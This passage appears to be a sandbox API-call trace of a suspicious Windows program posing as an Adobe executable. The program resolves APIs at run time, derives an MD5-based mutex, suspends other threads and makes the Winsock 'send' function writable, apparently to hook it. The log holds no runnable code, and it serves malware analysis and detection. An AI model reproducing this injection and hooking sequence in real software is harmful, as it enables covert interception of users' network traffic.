(hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0171.060] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0171.060] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0171.060] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0171.060] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0171.060] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0171.060] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0171.060] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0171.060] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0171.061] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0171.061] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0171.067] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0171.067] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0171.067] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0171.072] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0171.073] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0171.073] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0171.073] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0171.073] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0171.073] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0171.073] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0171.073] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0171.073] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0171.074] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0171.074] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0171.074] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0171.079] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0171.080] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0171.080] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0171.080] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0171.080] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0171.080] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0171.080] VirtualProtect (in: lpAddress=0xb0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x225fe20 | out: lpflOldProtect=0x225fe20*=0x40) returned 1 [0171.080] VirtualProtect (in: lpAddress=0xb0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x225fe20 | out: lpflOldProtect=0x225fe20*=0x4) returned 1 [0171.085] VirtualQuery (in: lpAddress=0xc0016, lpBuffer=0x225fe18, dwLength=0x1c | out: lpBuffer=0x225fe18*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0171.085] GetProcessHeap () returned 0x2a0000 [0171.085] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x364) returned 0x2c0530 [0171.085] RtlMoveMemory (in: Destination=0x2c0530, Source=0xc0016, Length=0x363 | out: Destination=0x2c0530) [0171.085] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xc0016) returned 0x0 [0171.085] GetCurrentProcessId () returned 0x7f0 [0171.085] GetProcessHeap () returned 0x2a0000 [0171.085] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x105) returned 0x2c08a0 [0171.085] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2c08a0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\zoodiffer.exe" (normalized: "c:\\program files (x86)\\adobe\\zoodiffer.exe")) returned 0x2a [0171.085] GetProcessHeap () returned 0x2a0000 [0171.085] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x105) returned 0x2c09b0 [0171.085] GetCurrentProcessId () returned 0x7f0 [0171.085] wsprintfA (in: param_1=0x2c09b0, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Adobe\\zoodiffer.exe37084212420323") returned 56 [0171.086] CryptAcquireContextA (in: phProv=0x225fe1c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x225fe1c*=0x2c0b00) returned 1 [0171.126] CryptCreateHash (in: hProv=0x2c0b00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x225fe20 | out: phHash=0x225fe20) returned 1 [0171.126] lstrlenA (lpString="C:\\Program Files (x86)\\Adobe\\zoodiffer.exe37084212420323") returned 56 [0171.126] CryptHashData (hHash=0x2c1400, pbData=0x2c09b0, dwDataLen=0x38, dwFlags=0x0) returned 1 [0171.126] CryptGetHashParam (in: hHash=0x2c1400, dwParam=0x2, pbData=0x225fe0c, pdwDataLen=0x225fe24, dwFlags=0x0 | out: pbData=0x225fe0c, pdwDataLen=0x225fe24) returned 1 [0171.126] wsprintfA (in: param_1=0x2c09b0, param_2="%02X" | out: param_1="84") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09b2, param_2="%02X" | out: param_1="AA") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09b4, param_2="%02X" | out: param_1="57") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09b6, param_2="%02X" | out: param_1="49") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09b8, param_2="%02X" | out: param_1="74") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09ba, param_2="%02X" | out: param_1="A0") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09bc, param_2="%02X" | out: param_1="C0") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09be, param_2="%02X" | out: param_1="E6") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09c0, param_2="%02X" | out: param_1="07") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09c2, param_2="%02X" | out: param_1="56") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09c4, param_2="%02X" | out: param_1="72") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09c6, param_2="%02X" | out: param_1="D3") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09c8, param_2="%02X" | out: param_1="C1") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09ca, param_2="%02X" | out: param_1="8F") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09cc, param_2="%02X" | out: param_1="FC") returned 2 [0171.126] wsprintfA (in: param_1=0x2c09ce, param_2="%02X" | out: param_1="0A") returned 2 [0171.126] CryptDestroyHash (hHash=0x2c1400) returned 1 [0171.126] CryptReleaseContext (hProv=0x2c0b00, dwFlags=0x0) returned 1 [0171.126] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="84AA574974A0C0E6075672D3C18FFC0A") returned 0x80 [0171.127] GetLastError () returned 0x0 [0171.127] Sleep (dwMilliseconds=0x1f4) [0171.665] GetCurrentProcessId () returned 0x7f0 [0171.665] GetCurrentThreadId () returned 0xb20 [0171.665] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0171.668] Thread32First (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.668] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.668] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.668] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.669] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.669] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.669] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.670] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.670] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.670] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.670] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.671] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.671] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.671] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.672] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.672] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.672] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.673] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.673] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.673] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.673] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.674] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.674] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.674] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.674] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.675] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.675] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.675] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.676] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.676] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.676] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.676] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.677] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.677] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.677] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.677] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.678] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.678] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.678] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.679] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.679] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.679] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.679] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.680] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.680] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.680] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.680] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.681] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.681] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.681] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.682] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.682] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.682] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.682] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.683] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.683] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.683] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.684] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.684] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.684] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.684] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.685] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.685] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.685] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.685] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.686] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.686] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.686] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.687] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.687] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.687] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.687] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.688] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.688] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.688] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.688] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.689] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.689] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.689] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.690] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.690] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.690] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.690] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.691] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.691] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.691] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.691] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.692] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.692] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.692] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.693] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.693] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.693] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.693] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.694] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.694] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.694] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.695] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.695] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.695] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.695] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.696] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.696] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.696] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.696] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.697] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.697] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.697] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.698] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.698] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.698] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.698] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.699] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.699] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.699] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.699] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.700] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.700] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.700] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.701] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.701] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.701] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.701] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.702] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.702] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.703] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.703] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.703] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.704] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.704] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.704] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.704] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.705] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.705] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.705] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.706] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.706] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.706] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.706] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.707] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.707] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.707] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.707] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.708] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.708] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.708] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.709] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.709] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.709] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.709] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.710] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.710] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.710] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.711] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.711] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.711] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.711] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.712] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.712] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.712] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.712] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.713] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.713] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.713] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.714] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.714] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.714] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.714] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.715] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.715] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.715] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.715] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.716] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.716] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.716] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.717] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.717] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.717] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.717] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.718] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.719] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.719] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.719] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.720] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.720] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.720] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.720] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.721] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.721] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.721] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.721] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.722] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.722] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.722] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.723] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.723] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.723] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.723] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.724] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.724] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.724] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.724] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.725] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.725] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.725] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.726] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.726] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.726] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.726] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.727] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.727] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.727] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.728] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.728] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.728] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.728] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.729] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.729] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.729] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.729] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.730] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.730] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.730] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.731] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.731] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.731] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.731] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.732] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.732] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.732] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.732] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.733] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.733] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.733] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.734] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.734] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.734] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.734] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.735] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.735] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.735] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.736] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.736] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.736] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.736] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.737] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.737] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.737] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.738] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.738] Thread32Next (hSnapshot=0x88, lpte=0x225fe10) returned 1 [0171.755] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b4) returned 0x8c [0171.755] SuspendThread (hThread=0x8c) returned 0x0 [0171.755] CloseHandle (hObject=0x8c) returned 1 [0171.755] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x8c [0171.756] SuspendThread (hThread=0x8c) returned 0x0 [0171.756] CloseHandle (hObject=0x8c) returned 1 [0171.779] CloseHandle (hObject=0x88) returned 1 [0171.779] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0171.779] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0171.779] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xb4224 | out: lpflOldProtect=0xb4224*=0x20) returned 1 [0171.779] 